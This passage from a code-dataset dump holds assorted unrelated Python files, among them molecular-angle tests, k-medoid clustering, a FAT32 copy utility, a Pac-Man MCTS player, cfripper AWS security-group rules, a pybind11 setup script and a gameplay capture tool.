\"%s/test/data/samples.xtc\" % cwd\n\ndef test_angles_1():\n \n angles_b,rr = bb.backbone_angles(fname)\n\n fh = open(\"%s/angles_01.test.dat\" % outdir,'w')\n stri = \"%20s \" % \"#\"\n for pp in dd.bb_angles:\n stri += \" %10s \" % pp\n stri += \"\\n\"\n \n for e in range(angles_b.shape[1]):\n stri += \"%20s \" % (rr[e])\n for k in range(angles_b.shape[2]):\n stri += \" %10.4f \" % angles_b[0,e,k]\n stri += \"\\n\"\n fh.write(stri)\n fh.close()\n comp(\"%s/angles_01.test.dat\" % refdir)\n \n\ndef test_angles_2():\n \n resi = [\"RC5_1_0\",\"RG_69_0\"]\n angles = [\"alpha\",\"beta\",\"chi\"]\n angles_b,rr = bb.backbone_angles(fname,residues=resi,angles=angles)\n stri = \"%20s \" % \"#\"\n for pp in angles:\n stri += \" %10s \" % pp\n stri += \"\\n\"\n\n for e in range(angles_b.shape[1]):\n stri += \"%20s \" % (rr[e])\n for k in range(angles_b.shape[2]):\n stri += \" %10.4f \" % angles_b[0,e,k]\n stri += \"\\n\"\n \n fh = open(\"%s/angles_02.test.dat\" % outdir,'w')\n fh.write(stri)\n fh.close()\n\n comp(\"%s/angles_02.test.dat\" % refdir)\n\n\ndef test_angles_3():\n \n resi = 
[\"RG_69_0\",\"RU_37_0\"]\n angles = [\"gamma\",\"alpha\"]\n \n angles_b,rr = bb.backbone_angles(fname,residues=resi,angles=angles)\n stri = \"%20s \" % \"#\"\n for pp in angles:\n stri += \" %10s \" % pp\n stri += \"\\n\"\n\n for e in range(angles_b.shape[1]):\n stri += \"%20s \" % (rr[e])\n for k in range(angles_b.shape[2]):\n stri += \" %10.4f \" % angles_b[0,e,k]\n stri += \"\\n\"\n\n fh = open(\"%s/angles_03.test.dat\" % outdir,'w')\n fh.write(stri)\n fh.close()\n comp(\"%s/angles_03.test.dat\" % refdir)\n\n\n\ndef test_angles_4():\n \n resi = [\"RG_69_0\",\"RU_37_0\"]\n angles = [\"gamma\",\"alpha\"]\n \n angles_b,rr = bb.backbone_angles(fname1,topology=fname,residues=resi,angles=angles)\n stri = \"\"\n for p in range(angles_b.shape[0]):\n for k in range(angles_b.shape[2]):\n stri += \" %10.4f %10.4f \" % (angles_b[p,0,k],angles_b[p,1,k])\n stri += \"\\n\"\n \n fh = open(\"%s/angles_04.test.dat\" % outdir,'w')\n fh.write(stri)\n fh.close()\n comp(\"%s/angles_04.test.dat\" % refdir)\n \n\n\n","repo_name":"srnas/barnaba","sub_path":"test/test_angles.py","file_name":"test_angles.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"29"} +{"seq_id":"74630380878","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 21 13:27:31 2020\n\n@author: 98sco\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nfrom random import randint\n\ndef euclid_dist(a, b):\n # calculate the eucludean distance between two points\n return math.sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2)\n\ndef compute_new_medoids(med, cluster):\n temp = [med,0]\n \n # for each point in the cluster...\n for p in cluster:\n # if the point is the medoid,\n # continue (no need to calculate and add zero)\n if p == med:\n continue\n # add the euclidean distance between the point and the medoid\n temp[1] += euclid_dist(med, p)\n \n i = len(cluster)\n # while there are points left...\n while i > 0:\n dist = 0\n # for point in cluster...\n for p in cluster:\n # if the point is the current temp medoid\n # continue (no need to calculate and add zero)\n if p == cluster[i - 1]:\n continue\n # add the euclidean distance between the point and the temp medoid\n dist += euclid_dist(cluster[i - 1], p)\n # if the total distance of the temp medoid is less than the current medoid\n # save the distance and index of the new medoid\n if dist < temp[1]:\n temp[0] = cluster[i - 1]\n temp[1] = dist\n i -= 1\n\n # return the new medoid\n return temp[0]\n \ndef kmedoid_cluster_prototype(k, points, medoids=None):\n # Base Cases\n if k == 0:\n return None\n if k == 1 or k == len(pts):\n return points\n \n # initial medoid error management\n if medoids != None:\n if len(medoids) != k:\n print(\"ERROR: Number of provided medoids does not equal k\")\n return\n # generate random medoids if none are input\n else:\n num_pts = len(points) - 1\n init = []\n medoids = []\n clusters = []\n \n # random centroid selection with hash-table style collision management\n for i in range(0,k):\n temp = randint(0,num_pts)\n while temp in init:\n temp = (temp + 1) % num_pts\n init.append(temp)\n medoids.append(points[temp])\n \n while(1):\n # generate empty lists for k-clusters\n clusters = []\n for i in range(0,k):\n clusters.append([])\n temp = [1024,0]\n # for each point...\n for pt in points:\n for n in range(0,k):\n # calculate the euclidean distance between the point\n # and each centroid[0,...,k]\n dist = euclid_dist(pt,medoids[n])\n # if 
the distace is shorter than the current saved centroid\n # save the new distance and centroid index\n if dist < temp[0]:\n temp[0] = dist\n temp[1] = n\n # add the current point to the closest centroid's cluster\n clusters[temp[1]].append(pt)\n # reset and continue\n temp = [1024,0] \n \n new_ctrs = []\n \n # for all clusters...\n for n in range(0,k):\n # if the cluster is empty,\n # keep the corresponding medoid \n if clusters[n] == []:\n new_ctrs.append(medoids[n])\n # else, generate a new medoid based its cluster\n else:\n new_ctrs.append(compute_new_medoids(medoids[n], clusters[n]))\n \n # if the new medoids are the same as the current medoids\n # exit the loop\n if new_ctrs == medoids:\n break\n # else, set the new medoids and continue\n else:\n medoids = new_ctrs\n \n # return the final clusters as a list of lists\n return clusters\n\n# small testing batch\npts = [[2,10],[2,5],[8,4],[5,8],[7,5],[6,4],[1,2],[4,9]]\n\nfor i in range(2,9):\n print(\"K =\",i)\n output = kmedoid_cluster_prototype(i, pts)\n\n for thing in output:\n print(thing)\n print()\n ","repo_name":"jcg1183/Datamining_Project","sub_path":"archive/clustering/kmedoidprototype.py","file_name":"kmedoidprototype.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5659569646","text":"import os\nimport sys\nimport glob\nimport re\nimport time\nimport shutil\nimport functools\nfrom modules.tinytag import TinyTag\n\n\ndef main():\n args = get_arguments()\n confirm = input(\"Is the destination empty (required for FAT sorting) [y/n]?\")\n if confirm == 'y':\n copy_full_directory(args['source'], args['destination'], args['source'])\n\ndef copy_full_directory(source, destination, source_directory):\n child_directories = get_all_subdirectories(source_directory)\n # Recursively copy child directories\n for child_directory in child_directories:\n # Concatenate directory names to form one flat directory for this folder\n destination_flat_dir = child_directory.replace(source_directory, '').replace(os.path.sep, ' - ')\n # Copy the music to the drive\n copy_fat_directory(child_directory, destination + destination_flat_dir)\n \ndef recursively_copy_directory_and_children(source, destination, source_directory):\n copy_fat_directory(source_directory, source_directory.replace(source, destination))\n child_directories = get_all_subdirectories(source_directory)\n # Recursively copy child directories\n for child_directory in child_directories:\n print('Recursively copying: ', child_directory)\n recursively_copy_directory_and_children(source, destination, child_directory)\n\ndef get_arguments():\n args = {}\n source = sys.argv[1]\n destination = sys.argv[2]\n if os.path.exists(source) and os.path.exists(destination):\n args['source'] = source\n args['destination'] = destination\n return args\n\ndef get_all_subdirectories(path):\n directories = []\n for cur_path, subdirs, files in os.walk(path):\n directories.append(cur_path)\n return natural_sort(directories)\n\ndef get_immediate_subdirectories(path):\n directories = [f.path for f in os.scandir(path) if f.is_dir()]\n return natural_sort(directories)\n\ndef get_files(path):\n files = []\n globs = glob.glob(path + \"/[!\\.]*\")\n for path in globs:\n if os.path.isfile(path):\n files.append(path)\n return files\n\ndef compare_by_track_natural(item1, item2):\n # Primary sort by track number meta data\n try:\n if TinyTag.get(item1).track is None and TinyTag.get(item2).track is not None:\n return 
1\n elif TinyTag.get(item1).track is not None and TinyTag.get(item2).track is None:\n return -1\n elif TinyTag.get(item1).track is not None and TinyTag.get(item2).track is not None:\n if int(TinyTag.get(item1).track) > int(TinyTag.get(item2).track):\n return 1\n elif int(TinyTag.get(item1).track) < int(TinyTag.get(item2).track):\n return -1\n else:\n return 0\n else:\n # Secondary sort by file name (natural sort)\n sorted_list = natural_sort([item1, item2])\n if sorted_list[0] == item1:\n return -1\n else:\n return 1\n except:\n return -1\n\ndef sort_by_track_and_filename(source_files):\n return sorted(source_files, key=functools.cmp_to_key(compare_by_track_natural))\n\ndef copy_fat_directory(source, destination):\n print('copy_fat_directory: ', source, destination)\n source_files = get_files(source)\n if len(source_files) <= 0:\n return\n sorted_source_files = sort_by_track_and_filename(source_files)\n # exit()\n for source_file_path in sorted_source_files:\n # Define destination file path and use original file name\n destination_file_path = source_file_path.replace(source, destination)\n # Remove track number from file name\n try:\n if TinyTag.get(source_file_path).track is not None:\n track_characters = len(str(TinyTag.get(source_file_path).track))\n if (\n os.path.basename(destination_file_path)[:track_characters + 1] == str(TinyTag.get(source_file_path).track) + ' '\n or os.path.basename(destination_file_path)[:track_characters + 2] == '0' + str(TinyTag.get(source_file_path).track) + ' '\n ):\n destination_file_path = os.path.dirname(destination_file_path) + os.path.sep + re.sub('^[0-9]+\\s(\\-\\s)?', '', os.path.basename(destination_file_path))\n except:\n pass\n # Create directory if doesn't exist\n os.makedirs(os.path.dirname(destination_file_path), exist_ok=True)\n if not os.path.exists(destination_file_path):\n # Copy file\n print('Copying to: ', destination_file_path)\n shutil.copy(source_file_path, destination_file_path)\n # Iterate files with a 2.1s pause\n time.sleep(2.1)\n\ndef natural_sort(l): \n convert = lambda text: int(text) if text.isdigit() else text.lower() \n alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ] \n return sorted(l, key = alphanum_key)\n \nmain()\n","repo_name":"davidzholland/FAT32Copy","sub_path":"copy_files.py","file_name":"copy_files.py","file_ext":"py","file_size_in_byte":4960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"19285947563","text":"import jeu as jeu\nimport numpy as np\nfrom random import choice\nimport copy\nimport random\n\n\nclass Node:\n\n\n def __init__(self,m,p):\n self.move=m\n self.parent=p\n self.win=0\n self.visits=0\n self.children = []\n\n\n def est_feuille(self):\n if len(self.children)==0:\n return True\n return False\n \n def selection(self):\n enfants=self.children\n ind=0\n max=Node(enfants[0],self).uct()\n for i in range(len(enfants)):\n if Node(enfants[i],self).uct()>max:\n ind=i\n max=Node(enfants[i],self).uct\n if Node(enfants[ind],self).est_feuille():\n return enfants[ind]\n return Node(enfants[ind],self).selection()\n\n def expansion(self,etat):\n position=etat[\"pacman\"]\n if not jeu.vie_en_moins(etat):\n for enfant in jeu.coup_possible(etat,position):\n nc=Node(enfant,self)\n self.children.append(nc)\n\n def backprogation(self,resultat):\n self.visits+=1\n self.win+=resultat\n\n def a_parent(self):\n if self.parent == None:\n return False\n return True\n \n def uct(self):\n wi=self.win\n ni=self.visits\n 
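# UCB1 score: mean reward plus a sqrt(2 * ln(parent visits) / visits)\n        # exploration bonus\n        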
Ni=self.parent.visits\n        return (wi/ni + np.sqrt(2)*np.sqrt(np.log(Ni)/ni))\n\n\n\ndef rollout(etat):\n    state=copy.deepcopy(etat)\n    compteur=0\n    # play random pacman moves (the ghost follows A*) until the game ends\n    while not (jeu.vie_en_moins(state) or jeu.victoire(state)):\n        position=state[\"pacman\"]\n        coups=jeu.coup_possible(state,position)\n        (i,j)=random.choice(coups)\n        k,l=jeu.astar_for_ghost(state)\n        jeu.deplace(state,\"pacman\",i,j)\n        state[\"f\"]=[k,l]\n        jeu.deplace(state,\"f\",k,l)\n        jeu.mange_fruit(state)\n        compteur+=1\n    if jeu.victoire(state) or compteur>=6:\n        return 1\n    else:\n        return 0\n\n\ndef MCTS1(etat):\n    root_node=Node(None,None)\n    while not jeu.vie_en_moins(etat):\n        n,s=root_node, copy.deepcopy(etat)\n        while not n.est_feuille():\n            n = n.selection()\n        # play the selected move\n        (i,j)=n.move\n        k,l=jeu.astar_for_ghost(s)\n        jeu.deplace(s,\"pacman\",i,j)\n        s[\"f\"]=[k,l]\n        jeu.deplace(s,\"f\",k,l)\n        jeu.mange_fruit(s)\n        n.expansion(s)\n        n = n.selection()\n        # simulate from the expanded node and backpropagate the result\n        resultat = rollout(s)\n        while n.a_parent():\n            n.backprogation(resultat)\n            n = n.parent\n    return n.parent\n\n\nclass PacManBoard(Node):\n    def find_children(etat):\n        position=etat[\"pacman\"]\n        if jeu.coup_possible(etat,position)==[]:\n            return set()\n        return jeu.coup_possible(etat,position)\n\n    def find_random_child(etat):\n        # position must be computed before it is used in the emptiness check\n        position=etat[\"pacman\"]\n        if jeu.coup_possible(etat,position)==[]:\n            return None\n        i,j=choice(jeu.coup_possible(etat,position))\n        return jeu.deplace(etat,\"pacman\",i,j)\n\n    def reward(etat):\n        if jeu.vie_en_moins(etat):\n            return 0\n        if jeu.victoire(etat):\n            return 1\n        else:\n            return 0\n\n\ndef enfants1(node):\n    childs=node.children\n    for child in childs:\n        child.parent=node\n        child.depth=node.depth+1\n    if node.est_feuille():\n        return node\n    return node.best_child()\n\ndef uct1(node):\n    wi=node.win\n    ni=node.depth\n    t=len(node.children)\n    return (wi/ni + np.sqrt(t/ni))\n\n\ndef selection1(node):\n    enfants=node.children\n    ind=0\n    max=uct1(enfants[0])\n    for i in range(len(enfants)):\n        if uct1(enfants[i])>max:\n            ind=i\n            max=uct1(enfants[i])\n    if enfants[ind].est_feuille():\n        return enfants[ind]\n    return selection1(enfants[ind])\n","repo_name":"iShynGu/TIPE","sub_path":"src2/mcts_pacman.py","file_name":"mcts_pacman.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
{"seq_id":"28652917614","text":"__all__ = [\"SecurityGroupOpenToWorldRule\", \"SecurityGroupIngressOpenToWorld\", \"SecurityGroupMissingEgressRule\"]\n\nfrom pycfmodel.model.resources.security_group import SecurityGroup\nfrom pycfmodel.model.resources.security_group_ingress import SecurityGroupIngress\n\nfrom cfripper.model.enums import RuleGranularity, RuleMode\nfrom cfripper.model.rule import Rule\n\n\nclass SecurityGroupOpenToWorldRule(Rule):\n    \"\"\"\n    Rule that checks for open security groups\n    \"\"\"\n\n    GRANULARITY = RuleGranularity.RESOURCE\n    REASON = \"Port {} open to the world in security group '{}'\"\n\n    def invoke(self, cfmodel):\n        for logical_id, resource in cfmodel.Resources.items():\n            if isinstance(resource, SecurityGroup) and resource.Properties.SecurityGroupIngress:\n                list_security_group_ingress = resource.Properties.SecurityGroupIngress\n                if not isinstance(list_security_group_ingress, list):\n                    list_security_group_ingress = [list_security_group_ingress]\n                for ingress in list_security_group_ingress:\n                    if ingress.ipv4_slash_zero() or ingress.ipv6_slash_zero():\n                        
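# the ingress is open to 0.0.0.0/0 or ::/0 -- flag each port in its range\n                        # that is not explicitly allowed\n                        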
for port in range(ingress.FromPort, ingress.ToPort + 1):\n if str(port) not in self._config.allowed_world_open_ports:\n self.add_failure(\n type(self).__name__, self.REASON.format(port, logical_id), resource_ids={logical_id}\n )\n\n\nclass SecurityGroupIngressOpenToWorld(SecurityGroupOpenToWorldRule):\n \"\"\"\n Rule that checks for open security groups ingress\n \"\"\"\n\n def invoke(self, cfmodel):\n for logical_id, resource in cfmodel.Resources.items():\n if isinstance(resource, SecurityGroupIngress) and (\n resource.ipv4_slash_zero() or resource.ipv6_slash_zero()\n ):\n for port in range(resource.Properties.FromPort, resource.Properties.ToPort + 1):\n if str(port) not in self._config.allowed_world_open_ports:\n self.add_failure(\n type(self).__name__, self.REASON.format(port, logical_id), resource_ids={logical_id}\n )\n\n\nclass SecurityGroupMissingEgressRule(Rule):\n \"\"\"\n Rule that checks for open security groups egress\n \"\"\"\n\n GRANULARITY = RuleGranularity.RESOURCE\n REASON = (\n \"Missing egress rule in {} means all traffic is allowed outbound. Make this explicit if it is desired \"\n \"configuration\"\n )\n RULE_MODE = RuleMode.MONITOR\n\n def invoke(self, cfmodel):\n for logical_id, resource in cfmodel.Resources.items():\n if isinstance(resource, SecurityGroup) and not resource.Properties.SecurityGroupEgress:\n self.add_failure(type(self).__name__, self.REASON.format(logical_id), resource_ids={logical_id})\n","repo_name":"midisfi/cfripper","sub_path":"cfripper/rules/security_group.py","file_name":"security_group.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"29"} +{"seq_id":"43454744760","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport shlex\nimport pybind11\nimport subprocess\n\nfrom setuptools import Extension, setup\nfrom setuptools.command.test import test as TestCommand\nfrom setuptools.command.build_ext import build_ext\n\n# A CMakeExtension needs a sourcedir instead of a file list.\n# The name must be the _single_ output extension from the CMake build.\n# If you need multiple extensions, see scikit-build.\nclass CMakeExtension(Extension):\n def __init__(self, name, sourcedir=\"\"):\n Extension.__init__(self, name, sources=[])\n self.sourcedir = os.path.abspath(sourcedir)\n\n\nclass CMakeBuild(build_ext):\n def build_extension(self, ext):\n extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))\n\n # required for auto-detection of auxiliary \"native\" libs\n if not extdir.endswith(os.path.sep):\n extdir += os.path.sep\n\n cfg = \"Debug\" if self.debug else \"Release\"\n # cfg = \"Debug\"\n\n # Set Python_EXECUTABLE instead if you use PYBIND11_FINDPYTHON\n # EXAMPLE_VERSION_INFO shows you how to pass a value into the C++ code\n # from Python.\n cmake_args = [\n \"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY={}\".format(extdir),\n \"-DPYTHON_EXECUTABLE={}\".format(sys.executable),\n \"-DCMAKE_BUILD_TYPE={}\".format(cfg), # not used on MSVC, but no harm\n \"-DCMAKE_CXX_STANDARD=14\"\n ]\n build_args = []\n\n # Enable required feature set in DDXspecial case for DDX:\n cmake_args += [\"-DPYTHON=ON\", \"-DTESTS=OFF\", \"-DEXAMPLES=OFF\",\n \"-DDDX_LIBRARY=OFF\"]\n\n # Add Pybind11 info\n cmake_args += [f\"-DPYBIND11_DIR={pybind11.get_cmake_dir()}\"]\n\n # Set CMAKE_BUILD_PARALLEL_LEVEL to control the parallel build level\n # across all generators.\n if \"CMAKE_BUILD_PARALLEL_LEVEL\" not in os.environ:\n # self.parallel is a Python 3 only way to 
set parallel jobs by hand\n            # using -j in the build_ext call, not supported by pip or PyPA-build.\n            if hasattr(self, \"parallel\") and self.parallel:\n                # CMake 3.12+ only.\n                build_args += [\"-j{}\".format(self.parallel)]\n\n        if not os.path.exists(self.build_temp):\n            os.makedirs(self.build_temp)\n\n        subprocess.check_call(\n            [\"cmake\", ext.sourcedir] + cmake_args, cwd=self.build_temp\n        )\n        subprocess.check_call(\n            [\"cmake\", \"--build\", \".\"] + build_args, cwd=self.build_temp\n        )\n\n\nclass PyTest(TestCommand):\n    user_options = [\n        (\"pytest-args=\", \"a\", \"Arguments to pass to pytest\"),\n    ]\n\n    def initialize_options(self):\n        TestCommand.initialize_options(self)\n        self.pytest_args = \"\"\n\n    def finalize_options(self):\n        pass\n\n    def run_tests(self):\n        # import here, cause outside the eggs aren't loaded\n        import pytest\n\n        errno = pytest.main([\"src\"] + shlex.split(self.pytest_args))\n        sys.exit(errno)\n\n\ndef read_readme():\n    with open(\"README.md\") as fp:\n        return \"\".join([line for line in fp if not line.startswith(\"'\")])\n\n# The information here can also be placed in setup.cfg - better separation of\n# logic and declaration, and simpler if you include description/version in a file.\nsetup(\n    name=\"pyddx\",\n    description=\"ddx continuum solvation library\",\n    long_description=read_readme(),\n    long_description_content_type=\"text/markdown\",\n    version=\"0.6.0\",\n    #\n    author=\"ddx developers\",\n    author_email=\"best@ians.uni-stuttgart.de\",\n    license=\"LGPL v3\",\n    url=\"https://ddsolvation.github.io/ddX\",\n    project_urls={\n        \"Source\": \"https://github.com/ddsolvation/ddX\",\n        \"Issues\": \"https://github.com/ddsolvation/ddX/issues\",\n    },\n    #\n    ext_modules=[CMakeExtension(\"pyddx\")],\n    zip_safe=False,\n    platforms=[\"Linux\", \"Mac OS-X\"],\n    python_requires=\">=3.8\",\n    install_requires=[\"numpy >= 1.14\", \"scipy >= 1.8\"],\n    tests_require=[\"pytest\", \"numpy\", \"scipy\"],\n    cmdclass={\"build_ext\": CMakeBuild, \"pytest\": PyTest, },\n)\n","repo_name":"ddsolvation/ddX","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"29"}
{"seq_id":"27260885656","text":"from itertools import product\n\nCOL = 90\nROW = 91\n\n# For sample\n# COL = 10\n# ROW = 10\n\nclass Square:\n    def __init__(self, state=\".\"):\n        self.occupied_neighbours = 0\n        self.occupied = state == \"#\"\n        self.floor = state == \".\"\n\n    def signal(self):\n        \"\"\"Tell this square that it has an occupied neighbour\"\"\"\n        self.occupied_neighbours += 1\n\n    def cycle(self):\n        \"\"\"Cycle the square to the next state\"\"\"\n        changed = False\n        if not self.floor:\n            if not self.occupied and self.occupied_neighbours == 0:\n                self.occupied = True\n                changed = True\n            elif self.occupied and self.occupied_neighbours >= 5:\n                self.occupied = False\n                changed = True\n            self.occupied_neighbours = 0\n        return changed\n\n    def __repr__(self):\n        return \"#\" if self.occupied else (\".\" if self.floor else 'L')\n\n\ndef print_space(space):\n    row = []\n    for i in range(-1,ROW+1):\n        row = []\n        for j in range(-1,COL+1):\n            row.append(space[(i,j)])\n        print(''.join(str(s) for s in row))\n\n\n# Read input\nwith open(\"inputs/11\", \"r\") as f:\n    data = f.read().split(\"\\n\")\n\n\n# Create initial space\nspace = {}\nfor x, row in enumerate(data):\n    for y, state in enumerate(row):\n        space[(x,y)] = Square(state)\n\nfor i in range(-1,COL+1):\n    space[(-1,i)] = Square()\n    space[(ROW,i)] = Square()\nfor i in 
range(-1,ROW+1):\n space[(i,-1)] = Square()\n space[(i,COL)] = Square()\n\nprint_space(space)\n\nchanged = True\nwhile changed:\n changed = False\n # Iterate over the space sending a signal to each neighbour\n for (x,y), square in space.items():\n if not square.occupied:\n continue\n for xo, yo in product((-1,0,1),(-1,0,1)):\n if xo == 0 and yo == 0:\n continue\n m = 1\n cx = x + (m*xo)\n cy = y + (m*yo)\n los = space[(cx,cy)]\n while los.floor and cx >= 0 and cx < ROW and cy >= 0 and cy < COL:\n m += 1\n cx = x + (m*xo)\n cy = y + (m*yo)\n los = space[(cx,cy)]\n los.signal()\n\n # Cycle the space, activating or deactivating\n for (x,y), square in space.items():\n changed = square.cycle() or changed\n print_space(space)\n\nprint(sum(s.occupied for s in space.values()))\n","repo_name":"alexpersin/AoC2020","sub_path":"2020/11/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"6609341483","text":"#!/usr/bin/python\nfrom PIL import Image, ImageDraw, ImageFont, ImageColor\nimport socket\nimport os\nimport RPi.GPIO as GPIO\nfrom time import sleep\nfrom pubnub import Pubnub\nimport credentials\nimport textwrap\nimport urllib\nimport cStringIO\n\nbuttonA = 17\nbuttonB = 22\nbuttonC = 23\nbuttonD = 27\n\nw = 240\nh = 321\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(buttonA, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nGPIO.setup(buttonB, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nGPIO.setup(buttonC, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nGPIO.setup(buttonD, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nfnt = ImageFont.truetype('/usr/share/fonts/truetype/roboto/Roboto-Medium.ttf', 20)\n\ndef display(message, color=(255,255,255)):\n\tcanvas = Image.new('RGBA', (w,h), (0,0,0))\n\td = ImageDraw.Draw(canvas)\n\n\tlines = textwrap.wrap(message, width=22)\n\ty = 0\n\tfor line in lines:\n\t\td.text((10,y), line, font=fnt, fill=color)\n\t\ty = y+22\n\n\tcanvas = canvas.rotate(90)\n\tcanvas.save(\"/tmp/test.png\")\n\tos.system('sudo fbi -T 2 -d /dev/fb1 -noverbose /tmp/test.png')\n\ndef displayImage(url):\n\tfile = cStringIO.StringIO(urllib.urlopen(url).read())\n\timg = Image.open(file)\n\timg = img.rotate(90)\n\timg.save(\"/tmp/test.png\")\n\tos.system('sudo fbi -T 2 -a -d /dev/fb1 -noverbose /tmp/test.png')\n\npubnub = Pubnub(publish_key=credentials.PUBLISH_KEY, subscribe_key=credentials.SUBSCRIBE_KEY)\n\ndef callback(message, channel):\n\tif 'text' in message.keys():\n\t\tdisplay(message['text'])\n\tif 'imageurl' in message.keys():\n\t\tdisplayImage(message['imageurl'])\n \ndef error(message):\n\tdisplay(\"ERROR : \" + str(message), color=(255,0,0))\n \ndef connect(message):\n\tdisplay(\"Connected.\", color=(0,255,0))\n \ndef reconnect(message):\n\tdisplay(\"Reconnected.\", color=(0,255,0))\n\ndef disconnect(message):\n\tdisplay(\"Disconnected.\", color=(255,0,0))\n\ndisplay(\"Connecting...\", color=(255,128,0))\npubnub.subscribe(channels='display', callback=callback, error=callback, connect=connect, reconnect=reconnect, disconnect=disconnect)\n\nwhile True:\n\tif(GPIO.input(buttonD) == False):\n\t\ttry:\n\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\t\ts.connect(('8.8.8.8', 0))\n\t\t\tlocal_ip_address = s.getsockname()[0]\n\t\texcept:\n\t\t\tlocal_ip_address = \"No 
IP\"\n\t\tdisplay(local_ip_address)\n\t\tsleep(1)\n\tsleep(.1)\n\n","repo_name":"mrichardson23/pitft_pubnub","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40642005602","text":"import key_scripts\r\nimport video_scripts\r\nimport log_scripts\r\nfrom vidgear.gears import WriteGear\r\nimport win32api as wapi\r\nimport os\r\nimport threading\r\nimport time\r\n\r\n\"\"\"\r\n press f11 to start captuing frames\r\n press f11 again to stop captuing\r\n press f10 to delete current capture, and restart immidately\r\n press f9 to stop program immidately\r\n\"\"\"\r\n\r\noutput_params = {\"-vcodec\":\"MPEG\", \"-input_framerate\": 25}\r\ncapture_state = 0\r\ndel_it = 0\r\nstart = len(os.listdir('data'))//2 + 1\r\n\r\n\r\ndef capture():\r\n global capture_state\r\n global del_it\r\n global start\r\n\r\n \r\n # while in not_exit mode\r\n while capture_state != 2:\r\n\r\n out_file = str(start)\r\n # capture mode\r\n if capture_state == 1:\r\n log_scripts.log_msg('capturing : '+out_file)\r\n \r\n out_file = 'data\\\\'+out_file\r\n vid_out = WriteGear(out_file+'.avi',compression_mode=False,\r\n custom_ffmpeg='C:\\Program Files (x86)\\ffmpeg\\bin',**output_params)\r\n txt_out = open(out_file+'.txt', 'w')\r\n\r\n # capture 512 frames, or stop if altered\r\n cnt = 0\r\n while cnt <= 512 and not del_it:\r\n vid_out.write(video_scripts.get_state())\r\n txt_out.write(key_scripts.get_state())\r\n cnt = cnt + 1\r\n \r\n vid_out.close()\r\n txt_out.close()\r\n\r\n # if delete\r\n if del_it:\r\n os.remove(out_file+'.avi')\r\n os.remove(out_file+'.txt')\r\n del_it = 0\r\n capture_state = 0\r\n log_scripts.log_msg('deleting : '+out_file)\r\n log_scripts.log_msg('state : False')\r\n log_scripts.log_msg('Capturing : Stop')\r\n else:\r\n log_scripts.log_msg('saving : '+out_file)\r\n start = start + 1\r\n else:\r\n log_scripts.log_msg('at hold')\r\n time.sleep(2)\r\n log_scripts.log_msg('capture thread exited')\r\n exit()\r\n \r\n \r\n \r\ntry:\r\n \r\n capture_thread = threading.Thread(target=capture)\r\n capture_thread.start()\r\n\r\n f11_state = 0\r\n f10_state = 0\r\n f9_state = 0\r\n while capture_state != 2:\r\n f11 = wapi.GetAsyncKeyState(0x7A)\r\n f10 = wapi.GetAsyncKeyState(0x79)\r\n f9 = wapi.GetAsyncKeyState(0x78)\r\n \r\n if f11 and f11_state == 0:\r\n print('alter')\r\n capture_state = 1 if capture_state == 0 else 0\r\n \r\n if f10 and f10_state == 0:\r\n del_it = 1\r\n \r\n if f9 and f9_state == 0:\r\n capture_state = 2\r\n\r\n f11_state = f11\r\n f10_state = f10\r\n f9_state = f9\r\n\r\n\r\n log_scripts.log_msg('exiting')\r\n capture_thread.join()\r\nexcept KeyboardInterrupt:\r\n exit()\r\n\r\n \r\n","repo_name":"aakash140799/ScreenCapture","sub_path":"capture_scripts.py","file_name":"capture_scripts.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"34587044090","text":"# -*- coding: utf-8 -*-\n\n# API REST:\nfrom rest_framework import serializers\n\n# Modelos:\nfrom .models import Mensaje\n\n\n# ----------------- ORDEN DE TRABAJO ----------------- #\nclass MensajeSerializer(serializers.HyperlinkedModelSerializer):\n\n usuario_id = serializers.SerializerMethodField()\n usuario_nombre = serializers.SerializerMethodField()\n usuario_img = serializers.SerializerMethodField()\n\n class Meta:\n model = Mensaje\n fields = (\n 'url',\n 'pk',\n 
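# the usuario_* entries are read-only values resolved by the\n            # SerializerMethodField getters defined below\n            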
